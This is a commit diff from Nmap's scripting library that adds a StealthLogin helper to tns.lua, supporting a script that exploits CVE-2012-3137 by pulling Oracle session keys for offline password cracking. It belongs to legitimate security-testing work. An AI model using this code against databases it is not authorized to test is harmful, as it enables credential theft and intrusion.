o [NSE] Added oracle-brute-stealth which exploits CVE-2012-3137, a weakness

in the Oracle O5LOGIN authentication scheme. [Dhiru Kholia]
2025-12-31 03:49:01 +00:00 · 2012-10-06 19:59:45 +00:00
parent 655f766445
commit 6cfa5aea0f
5 changed files with 230 additions and 4 deletions
--- a/nselib/tns.lua
+++ b/nselib/tns.lua
@@ -1754,6 +1754,27 @@ Helper = {
 		self.auth_session = data["AUTH_SESSION_ID"]
 		return true
 	end,
+
+	--- Steal auth data from database
+	-- @param user containing the Oracle user name
+	-- @param pass containing the Oracle user password
+	-- @return true on success, false on failure
+	-- @return err containing error message when status is false
+	StealthLogin = function( self, user, password )
+		local data, packet, status, tns, parser
+		local sesskey_enc, auth_pass, auth
+		local auth_options = AuthOptions:new()
+
+		status, auth = self.comm:exchTNSPacket( Packet.PreAuth:new( user, auth_options, self.os ) )
+		if ( not(status) ) then
+			return false, auth
+		end
+		if ( auth["AUTH_SESSKEY"] ) then
+			return true, auth
+		else
+			return false
+		end
+	end,
 	
 	--- Queries the database
 	--